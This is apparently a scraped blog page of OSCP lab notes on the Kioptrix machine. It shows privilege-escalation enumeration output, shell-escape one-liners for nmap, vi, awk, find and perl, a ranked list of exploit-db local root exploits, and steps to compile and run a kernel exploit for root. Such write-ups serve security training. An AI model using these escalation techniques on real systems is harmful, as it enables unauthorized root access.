lksctp-tools-1.0.2-6.4E.1
lksctp-tools-devel-1.0.2-6.4E.1
lockdev-1.0.1-6.2
lockdev-devel-1.0.1-6.2
logrotate-3.7.1-6.RHEL4
logwatch-5.2.2-2.EL4
lrzsz-0.12.20-19
lsof-4.72-1.4
ltrace-0.4-3.el4
lvm2-2.02.21-5.el4
m4-1.4.1-16
mailcap-2.1.17-1
mailx-8.1.1-37.EL4
make-3.80-6.EL4
MAKEDEV-3.15.2-3
man-1.5o1-10.rhel4
man-pages-1.67-12.EL4
mdadm-1.12.0-2
mgetty-1.1.31-2
mingetty-1.07-3
minicom-2.00.0-19
mkbootdisk-1.5.2-1
mkinitrd-4.2.1.10-1.1
mktemp-1.5-20
mod_perl-1.99_16-4.centos4
mod_python-3.1.3-5.1
mod_ssl-2.0.52-32.ent.centos4
module-init-tools-3.1-0.pre5.3.4
mtools-3.9.9-9
mtr-0.54-10
mt-st-0.8-1
mx-2.0.5-3
MyODBC-2.50.39-25.RHEL4.1
mysql-4.1.22-2.el4
mysqlclient10-3.23.58-4.RHEL4.1
mysql-devel-4.1.22-2.el4
MySQL-python-1.2.1_p2-1.el4.1
mysql-server-4.1.22-2.el4
nano-1.2.4-1
ncurses-5.4-13
ncurses-devel-5.4-13
netconfig-0.8.21-1.1
netdump-0.7.16-10
net-snmp-libs-5.1.2-11.EL4.10
net-tools-1.60-37.EL4.9
NetworkManager-0.3.1-4.el4
newt-0.51.6-9.rhel4
newt-devel-0.51.6-9.rhel4
newt-perl-1.08-7
nfs-utils-1.0.6-80.EL4
nfs-utils-lib-1.0.6-8
nmap-3.70-1
nscd-2.3.4-2.36
nss_db-2.2-29
nss_ldap-226-18
ntp-4.2.0.a.20040617-6.el4
ntsysv-1.3.13.5.EL4-1
numactl-0.6.4-1.39
open-1.4-21
openib-1.1-7
OpenIPMI-1.4.14-1.4E.17
OpenIPMI-libs-1.4.14-1.4E.17
OpenIPMI-tools-1.4.14-1.4E.17
openldap-2.2.13-7.4E
openldap-clients-2.2.13-7.4E
openldap-devel-2.2.13-7.4E
opensm-libs-2.0.0-7
openssh-3.9p1-8.RHEL4.20
openssh-clients-3.9p1-8.RHEL4.20
openssh-server-3.9p1-8.RHEL4.20
openssl-0.9.7a-43.16
openssl-devel-0.9.7a-43.16
oprofile-0.8.1-26
ORBit2-2.12.0-3
pam-0.77-66.21
pam_ccreds-3-3.rhel4.2
pam-devel-0.77-66.21
pam_krb5-2.1.8-1
pam_passwdqc-0.7.5-2
pam_smb-1.1.7-5
pango-1.6.0-9
parted-1.6.19-16.EL
passwd-0.68-10.1
patch-2.5.4-20
patchutils-0.2.30-1
pax-3.0-9
pciutils-2.1.99.test8-3.4
pciutils-devel-2.1.99.test8-3.4
pcmcia-cs-3.2.7-3.5
pcre-4.5-3.2.RHEL4
pdksh-5.2.14-30.3
perl-5.8.5-36.RHEL4
perl-Convert-ASN1-0.18-3
perl-Crypt-SSLeay-0.51-5
perl-DBD-MySQL-2.9004-3.1
perl-DBI-1.40-8
perl-Filter-1.30-6
perl-HTML-Parser-3.35-6
perl-HTML-Tagset-3.03-30
perl-LDAP-0.31-5
perl-libwww-perl-5.79-5
perl-libxml-perl-0.07-30
perl-URI-1.30-4
perl-XML-Dumper-0.71-2
perl-XML-Encoding-1.01-26
perl-XML-Grove-0.46alpha-27
perl-XML-LibXML-1.58-1
perl-XML-LibXML-Common-0.13-7
perl-XML-NamespaceSupport-1.08-6
perl-XML-Parser-2.34-5
perl-XML-SAX-0.12-7
perl-XML-Twig-3.13-6
php-4.3.9-3.26
php-ldap-4.3.9-3.26
php-mysql-4.3.9-3.26
php-pear-4.3.9-3.26
pinfo-0.6.8-7
pkgconfig-0.15.0-3
policycoreutils-1.18.1-4.12
popt-1.9.1-22_nonptl
portmap-4.0-63
ppp-2.4.2-6.4.RHEL4
prelink-0.3.3-0.EL4
procmail-3.22-14
procps-3.2.3-8.6
psacct-6.3.2-39.rhel4
psgml-1.2.5-4
psmisc-21.4-4.1
pstack-1.2-6
pygtk2-2.4.0-1
pygtk2-libglade-2.4.0-1
pyOpenSSL-0.6-1.p23
pyorbit-2.0.1-1
python-2.3.4-14.4
python-devel-2.3.4-14.4
python-elementtree-1.2.6-5.el4.centos
python-ldap-2.0.1-2
python-sqlite-1.1.7-1.2.1
python-urlgrabber-2.9.8-2
pyxf86config-0.3.19-1
PyXML-0.8.3-6
qt-3.3.3-10.RHEL4
quota-3.12-6.el4
rcs-5.7-26
rdate-1.4-2
rdist-6.1.5-38.40.2
readline-4.3-13
readline-devel-4.3-13
redhat-logos-1.1.26-1.centos4.4
redhat-lsb-3.0-8.EL
redhat-menus-3.7.1-2
redhat-rpm-config-8.0.32.1-4
rhnlib-2.1.1-3.el4
rhpl-0.148.5-1
rmt-0.4b39-3.EL4.2
rootfiles-8-1
rpm-4.3.3-22_nonptl
rpm-build-4.3.3-22_nonptl
rpmdb-CentOS-4.5-0.20070506
rpm-devel-4.3.3-22_nonptl
rpm-libs-4.3.3-22_nonptl
rpm-python-4.3.3-22_nonptl
rp-pppoe-3.5-22
rsh-0.17-25.4
rsync-2.6.3-1
samba-client-3.0.10-1.4E.11
samba-common-3.0.10-1.4E.11
schedutils-1.4.0-2
screen-4.0.2-5
sed-4.1.2-6.el4
selinux-policy-targeted-1.17.30-2.145
sendmail-8.13.1-3.2.el4
setarch-1.6-1
setools-2.3-4
setserial-2.17-17
setup-2.5.37-1.3
setuptool-1.17-2
sgml-common-0.6.3-17
shadow-utils-4.0.3-61.RHEL4
shared-mime-info-0.15-10.1.el4
slang-1.4.9-8
slang-devel-1.4.9-8
slocate-2.7-13.el4.6
sox-12.17.5-3
specspo-9.0.92-1.3
splint-3.1.1-4
sqlite-3.3.6-2
squid-2.5.STABLE14-1.4E
statserial-1.1-35
strace-4.5.15-1.el4.1
stunnel-4.05-3
sudo-1.6.7p5-30.1.3
swig-1.3.21-6
symlinks-1.2-22
sysfsutils-1.2.0-1
sysfsutils-devel-1.2.0-1
sysklogd-1.4.1-26_EL
syslinux-2.11-1
sysreport-1.3.15-8
system-config-date-1.7.15-0.RHEL4.3
system-config-httpd-1.3.1-1
system-config-keyboard-1.2.5-1
system-config-language-1.1.8-4
system-config-mouse-1.2.9-1
system-config-network-1.3.22.0.EL.4.2-1
system-config-network-tui-1.3.22.0.EL.4.2-1
system-config-nfs-1.2.8-1
system-config-packages-1.2.23-1
system-config-rootpassword-1.1.6-1
system-config-securitylevel-1.4.19.2-1
system-config-securitylevel-tui-1.4.19.2-1
system-config-services-0.8.15-1
system-config-soundcard-1.2.10-2.EL4
system-config-users-1.2.27-0.EL4.4
system-logviewer-0.9.12-0.2
systemtap-0.5.12-1
systemtap-runtime-0.5.12-1
SysVinit-2.85-34.4
talk-0.17-26
tar-1.14-12.RHEL4
tcl-8.4.7-2
tclx-8.3.5-4
tcpdump-3.8.2-10.RHEL4
tcp_wrappers-7.6-37.2
tcsh-6.13-9.el4.1
telnet-0.17-31.EL4.3
termcap-5.4-3
texinfo-4.7-5.el4.2
time-1.7-25
tk-8.4.7-2
tmpwatch-2.9.1-1
tog-pegasus-2.5.1-2.EL4
tog-pegasus-devel-2.5.1-2.EL4
traceroute-1.4a12-24.EL4.1
ttmkfdir-3.0.9-20.el4
tux-3.2.18-2
tzdata-2007d-1.el4
udev-039-10.15.EL4
umb-scheme-3.2-36.EL4
unix2dos-2.2-24.1
unixODBC-2.2.11-1.RHEL4.1
unzip-5.51-9.EL4.5
up2date-4.5.5-5.centos4
urw-fonts-2.2-6.1
usbutils-0.11-7.RHEL4.1
usermode-1.74-2
usermode-gtk-1.74-2
utempter-0.5.5-5
util-linux-2.12a-16.EL4.25
valgrind-3.1.1-1.EL4
valgrind-callgrind-0.10.1-2.EL4
vconfig-1.8-4
vim-minimal-6.3.046-0.40E.7
vixie-cron-4.1-44.EL4
vsftpd-2.0.1-5.EL4.5
webalizer-2.01_10-25
wget-1.10.2-0.40E
which-2.16-4
wireless-tools-28-0.pre16.3.3.EL4
wireshark-0.99.5-EL4.1
words-3.0-3.2
wpa_supplicant-0.4.9-1.1.el4
wvdial-1.54.0-3
Xaw3d-1.5-24
xdelta-1.1.3-15
xinetd-2.3.13-4.4E.1
xmlsec1-1.2.6-3
xmlsec1-openssl-1.2.6-3
xorg-x11-font-utils-6.8.2-1.EL.18
xorg-x11-libs-6.8.2-1.EL.18
xorg-x11-Mesa-libGL-6.8.2-1.EL.18
xorg-x11-xauth-6.8.2-1.EL.18
xorg-x11-xfs-6.8.2-1.EL.18
ypbind-1.17.2-13
yp-tools-2.8-7
yum-2.4.3-3.el4.centos
zip-2.3-27
zlib-1.2.1.2-1.2
zlib-devel-1.2.1.2-1.2
zsh-4.2.0-4.EL.4.5 [+] Current processes
USER PID START TIME COMMAND
root 1 01:23 0:04 init
root 2 01:23 0:00 [ksoftirqd/0]
root 3 01:23 0:00 [events/0]
root 4 01:23 0:00 [khelper]
root 5 01:23 0:00 [kacpid]
root 82 01:23 0:00 [kblockd/0]
root 83 01:23 0:00 [khubd]
root 100 01:23 0:00 [pdflush]
root 101 01:23 0:00 [pdflush]
root 102 01:23 0:00 [kswapd0]
root 103 01:23 0:00 [aio/0]
root 249 01:23 0:00 [kseriod]
root 482 01:23 0:00 [ata/0]
root 483 01:23 0:00 [ata_aux]
root 498 01:23 0:00 [kjournald]
root 1695 01:24 0:00 udevd
root 1727 01:24 0:00 [shpchpd_event]
root 1812 01:24 0:00 [kauditd]
root 1923 01:24 0:00 [kjournald]
root 2511 01:24 0:00 syslogd
root 2515 01:24 0:00 klogd
rpc 2542 01:24 0:00 portmap
rpcuser 2561 01:24 0:00 rpc.statd
root 2587 01:24 0:00 rpc.idmapd
root 2659 01:24 0:00 /usr/sbin/acpid
root 2720 01:24 0:00 /usr/sbin/sshd
root 2756 01:24 0:00 xinetd
root 2774 01:24 0:00 sendmail:
smmsp 2784 01:24 0:00 sendmail:
root 2794 01:24 0:00 gpm
root 2803 01:24 0:00 crond
xfs 2825 01:24 0:00 xfs
root 2842 01:24 0:00 /usr/sbin/atd
dbus 2851 01:24 0:00 dbus-daemon-1
root 2860 01:24 0:00 hald
root 3115 01:24 0:00 dhclient
root 3118 01:24 0:00 httpd
root 3144 01:24 0:00 /bin/sh
mysql 3197 01:24 0:01 /usr/libexec/mysqld
root 3215 01:24 0:00 /sbin/mingetty
root 3216 01:24 0:00 /sbin/mingetty
root 3217 01:24 0:00 /sbin/mingetty
root 3218 01:24 0:00 /sbin/mingetty
root 3219 01:24 0:00 /sbin/mingetty
root 3220 01:24 0:00 /sbin/mingetty
root 4150 02:29 0:00 cupsd
apache 4388 02:29 0:04 httpd
apache 4393 02:29 0:04 httpd
apache 4395 02:29 0:04 httpd
apache 9499 02:36 0:03 httpd
apache 9519 02:36 0:03 httpd
apache 9532 02:36 0:03 httpd
apache 9533 02:36 0:02 httpd
apache 9536 02:36 0:03 httpd
apache 9537 02:36 0:03 httpd
apache 9538 02:36 0:03 httpd
apache 9539 02:36 0:03 httpd
apache 9543 02:36 0:03 httpd
apache 9544 02:36 0:03 httpd
apache 9562 02:48 0:00 httpd
apache 9563 02:48 0:00 httpd
apache 9564 02:48 0:00 httpd
apache 9565 02:48 0:00 httpd
apache 9569 02:48 0:00 httpd
apache 9574 02:48 0:00 httpd
apache 10155 02:48 0:00 httpd
apache 12251 03:42 0:00 sh
apache 12253 03:42 0:00 bash
apache 12259 03:57 0:00 python
apache 12389 03:57 0:00 sh
sh: apache2: command not found
sh: apache2ctl: command not found
apache 12390 03:57 0:00 ps
apache 12391 03:57 0:00 awk [+] Apache Version and Modules
Server version: Apache/2.0.52
Server built: May 4 2007 06:25:03
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c [+] Apache Config File [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.6.7p5 [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER... root 3217 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 2756 01:24 0:00 xinetd
Possible Related Packages:
xinetd-2.3.13-4.4E.1
root 498 01:23 0:00 [kjournald]
root 102 01:23 0:00 [kswapd0]
root 3219 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 2587 01:24 0:00 rpc.idmapd
root 3144 01:24 0:00 /bin/sh
root 3115 01:24 0:00 dhclient
Possible Related Packages:
dhclient-3.0.1-59.EL4
root 482 01:23 0:00 [ata/0]
root 100 01:23 0:00 [pdflush]
root 3220 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 249 01:23 0:00 [kseriod]
root 103 01:23 0:00 [aio/0]
root 82 01:23 0:00 [kblockd/0]
root 1812 01:24 0:00 [kauditd]
root 5 01:23 0:00 [kacpid]
root 2794 01:24 0:00 gpm
Possible Related Packages:
gpm-1.20.1-71.RHEL4
gpm-devel-1.20.1-71.RHEL4
root 83 01:23 0:00 [khubd]
root 2860 01:24 0:00 hald
root 4150 02:29 0:00 cupsd
root 2515 01:24 0:00 klogd
Possible Related Packages:
sysklogd-1.4.1-26_EL
root 2842 01:24 0:00 /usr/sbin/atd
root 1695 01:24 0:00 udevd
root 2803 01:24 0:00 crond
root 2511 01:24 0:00 syslogd
root 2 01:23 0:00 [ksoftirqd/0]
root 3215 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 101 01:23 0:00 [pdflush]
root 483 01:23 0:00 [ata_aux]
root 2774 01:24 0:00 sendmail:
root 1923 01:24 0:00 [kjournald]
root 3216 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 4 01:23 0:00 [khelper]
root 3218 01:24 0:00 /sbin/mingetty
Possible Related Packages:
mingetty-1.07-3
root 2720 01:24 0:00 /usr/sbin/sshd
root 1727 01:24 0:00 [shpchpd_event]
root 3118 01:24 0:00 httpd
Possible Related Packages:
httpd-2.0.52-32.ent.centos4
httpd-manual-2.0.52-32.ent.centos4
httpd-suexec-2.0.52-32.ent.centos4
system-config-httpd-1.3.1-1
root 1 01:23 0:04 init
Possible Related Packages:
initscripts-7.93.29.EL-1.centos4
mkinitrd-4.2.1.10-1.1
module-init-tools-3.1-0.pre5.3.4
SysVinit-2.85-34.4
root 2659 01:24 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid-1.0.3-2
root 3 01:23 0:00 [events/0] [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... [+] Installed Tools
/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/bin/vi
/usr/bin/nmap
/usr/bin/find
/usr/bin/wget
/usr/bin/ftp [+] Related Shell Escape Sequences... nmap--> --interactive
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";' [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
- 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit [] || http://www.exploit-db.com/exploits/9598 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
- 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
- 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- 2.4/2.6 sock_sendpage() Local Root Exploit [] || http://www.exploit-db.com/exploits/9641 || Language=c
- 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c Finished
=================================================================================================

Start the Nmap in the Kioptrix server.

nmap --interactive

!sh

id

pwd

6. Find the exploit method related to the Linux version 2.6.9-55.EL on the Exploit Database.

https://www.exploit-db.com/exploits/9542

Down load the exploit file to the Kali Linux and copy it to the /var/www/html folder.

Down load the exploit file to the /tmp folder on Kioptirx Server.

Build and execute the exploit file. Ahaaa! We get the root privilege now.

gcc .c -o exploit

7. We can find more confidential information with root privilege.

8. Auto Pentest using the tool such as Metasploit pro is also a good choice.

OSCP Learning Notes - Capstone(1)的更多相关文章

  1. OSCP Learning Notes - Capstone(4)

    SickOS 1.2 Walkthrough Preparation: Down load the SickOS virtual machines from the following website ...

  2. OSCP Learning Notes - Capstone(3)

    DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website ...

  3. OSCP Learning Notes - Capstone(2)

    BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: ...

  4. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  5. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  6. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  7. OSCP Learning Notes - Buffer Overflows(1)

    Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -  ...

  8. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

  9. OSCP Learning Notes - Enumeration(4)

    DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally use ...

随机推荐

  1. ca78a_c++_字符串流在内存中的输入输出(速度快)

    /*ca78a_c++_字符串流在内存中的输入输出**字符串流:在内存中的输入输出.(在内存中进行,速度快)**文件流 :是对文件进行输入和输出.(在磁盘里面进行)istringstream(输入), ...

  2. 测试人员遇到Android APP崩溃和无响应手足无措?

    这2天,在测APP兼容性时,遇到APP奔溃闪退的情况.将问题反馈给开发后,开发自己调试后,没有复现.由于又是远程,base地不在一块,我总不能把手机寄过去吧,那也太费事了. 所以就想到,提供明确的报错 ...

  3. 有关 HashMap 面试会问的一切

    前言 HashMap 是无论在工作还是面试中都非常常见常考的数据结构. 比如 Leetcode 第一题 Two Sum 的某种变种的最优解就是需要用到 HashMap 的,高频考题 LRU Cache ...

  4. Maven发展历史

    1.1 Maven是什么 Maven是一个项目管理和综合工具. Maven提供了开发人员构建一个完整的生命周期框架.开发者团队可以自动完成项目的基础工具建设, Maven使用标准的目录结构和默认构建生 ...

  5. IDEA SonarLint安装及使用

    SonarLint插件安装IDEA菜单栏选择File->Settings,左边栏选择Plugins 在线安装选择Browse repositories,搜索Sonar,选择SonarLint进行 ...

  6. 物联网SIM卡和SIM卡,真的不是一回事

    [摘要]在物联网解决方案中,设备移动上网也需要使用SIM卡.那么,SIM卡是什么?各种SIM卡有什么区别?物联网SIM卡如何选择?本文将为您答疑解惑. 通信进化史 过去几百年间,通信技术经历了天变地异 ...

  7. 几个常见CSS错误和解决办法

    1.IE6下,当float存在时,margin双倍的问题 解决方法:加display:inline; 例: #content {    float: left;     width: 500px;   ...

  8. 廖雪峰Python教学课后作业---datetime

    # -*- coding: utf-8 -*- import re from datetime import datetime, timezone, timedelta def to_timestam ...

  9. Springboot 2.X的RequestMapping 的映射路径怎么看不到了?

    在使用spring boot 1.X的时候我们可以在console中看到mapping的映射路径 2020-01-12 19:10:19.996 INFO 2711 --- [ main] s.w.s ...

  10. 每日一题 - 剑指 Offer 40. 最小的k个数

    题目信息 时间: 2019-06-30 题目链接:Leetcode tag: 快排 难易程度:中等 题目描述: 输入整数数组 arr ,找出其中最小的 k 个数.例如,输入4.5.1.6.2.7.3. ...